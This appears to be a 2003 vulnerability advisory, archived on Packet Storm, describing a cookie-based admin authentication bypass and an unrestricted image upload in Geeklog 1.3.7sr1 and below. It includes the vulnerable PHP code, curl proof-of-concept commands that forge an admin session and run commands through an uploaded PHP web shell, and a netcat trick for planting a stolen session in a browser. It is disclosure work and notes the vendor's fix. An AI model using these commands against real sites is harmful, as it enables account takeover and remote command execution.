exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

geeklog.txt

geeklog.txt
Posted May 30, 2003
Authored by Pokleyzz | Site scan-associates.net

Geeklog version 1.3.7ar1 and below is susceptible to multiple vulnerabilities. There is a SQL integer manipulation flaw in the authentication script that will allow a remote attacker to get administrative access and there is also a lack of error checking when images are uploaded that allow an attacker to upload files with php code that can be used to execute any command as apache user on remote server.

tags | exploit, remote, php, vulnerability
SHA-256 | b929f64a82369714c4e73c1aa6713942f4e3fa31bd56ba1f5265811388f21c2b

geeklog.txt

Change Mirror Download
Products: Geeklog 1.3.7sr1 and below (http://www.geeklog.net)
Date: 29 May 2003
Author: pokleyzz <pokleyzz_at_scan-associates.net>
Contributors: sk_at_scan-associates.net
shaharil_at_scan-associates.net
munir_at_scan-associates.net
URL: http://www.scan-associates.net

Summary: Geeklog 1.3.7sr1 and below multiple vulnerabilities.

Description
===========
Geeklog is a 'blog', otherwise known as a Weblog. It allows you to create your
own virtual community area, complete with user administration, story posting,
messaging, comments, polls, calendar, weblinks, and more! It can run on many
different operating systems, and uses PHP4 and MySQL.

Details
=======
i) SQL Integer manipulation in authentication script.

from lib-sessions.php line 128 ------------------------------------------------

if (isset($HTTP_COOKIE_VARS[$_CONF['cookie_name']])) {
// Session cookie doesn't exist but a perminant cookie does.
// Start a new session cookie;
if ($_SESS_VERBOSE) {
COM_errorLog('perm cookie found from lib-common.php',1);
}

$userid = $HTTP_COOKIE_VARS[$_CONF['cookie_name']];
$cookie_password = $HTTP_COOKIE_VARS[$_CONF['cookie_password']];

//echo $userid;

$userpass = DB_getItem($_TABLES['users'],'passwd',"uid = $userid");

if ($cookie_password <> $userpass) {
// User could have modified UID in cookie, don't do shit

} else {
if ($userid) {
$user_logged_in = 1;
//echo $userid;
// Create new session and write cookie
$sessid = SESS_newSession($userid, $REMOTE_ADDR, $_CONF['session_cookie_timeout'], $_CONF['cookie_ip']);
SESS_setSessionCookie($sessid, $_CONF['session_cookie_timeout'], $_CONF['cookie_session'], $_CONF['cookie_path'], $_CONF['cookiedomain'], $_CONF['cookiesecure']);
$userdata = SESS_getUserDataFromId($userid);
$_USER = $userdata;
}
}
}

------------------------------------------------------------------------

In this case :
DB_getItem($_TABLES['users'],'passwd',"uid = $userid"); will execute
"SELECT passwd from $_TABLES['users'] where uid=$userid"

When we supply non-existance user we can by pass the ($cookie_password <> $userpass)
cause $userpass and $cookie_password will be null.

example:
curl -b geeklog=9999 http://blablaba/users.php



SESS_newSession($userid, $REMOTE_ADDR, $_CONF['session_cookie_timeout'], $_CONF['cookie_ip']);
will execute SQL query
"INSERT INTO {$_TABLES['sessions']} (sess_id, md5_sess_id, uid, start_time, remote_ip) VALUES ($sessid, '$md5_sessid', 9999, $currtime, '$remote_ip')"

valid session for user 9999 which is not exist will insert to database;

Integer manipulation to get admin access
----------------------------------------
By supplying floating point number as userid, user can easily login as any geeklog
user. This is because userid is integer value in database and floating point number
always give null value for $userpass (non-existance user) . 2.1 will insert as 2 in
column with integer data type.

proof of concept:
curl -b geeklog=2.1 -D header.txt http://blablaba/users.php

header.txt will contain valid session for admin.


ii) Upload image with any extension.

There is lack in error checking for upload image scripts where user can upload valid
with any extention ( users and stories module). User supplied extension will be used
for images extension. By embed php code in image user can execute any command as apache
user on remote server.

proof of concept:
i) Upload attached file to server using "Internet Explorer". "Internet Explorer"
will use file header to generate mime-type for uploaded file.
ii) curl -d 'cmd=ps -ef' http://blablabla/images/XXXXX-X.php


Vendor Response
===============
Vendor has been contacted on 19/05/2003 and fix version is available
http://www.geeklog.net


Tips
====
Simple way to trick mozilla to store session from any site.

i) Edit header.txt.

----------------header.txt -------------------------

HTTP/1.1 200 OK
Date: Sat, 17 May 2003 16:15:23 GMT
Server: Apache
Set-Cookie: gl_session=1828197392; path=/
Set-Cookie: LastVisit=1053188123; expires=Sun, 16-May-2004 16:15:23 GMT;
path=/
Set-Cookie: LastVisitTemp=deleted; expires=Fri, 17-May-2002 16:15:22
GMT; path=/; domain=http://blablabla/
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1

10
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa


----------------header.txt --------------------------

ii) Using netcat netcat
# nc -l -p 9090 < header.txt

iii) Set your mozilla http proxy server to 127.0.0.1:9090

iii) Browse to http://blablaba.com/

iv) Unset proxy and browse to http://blablabla.com


Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close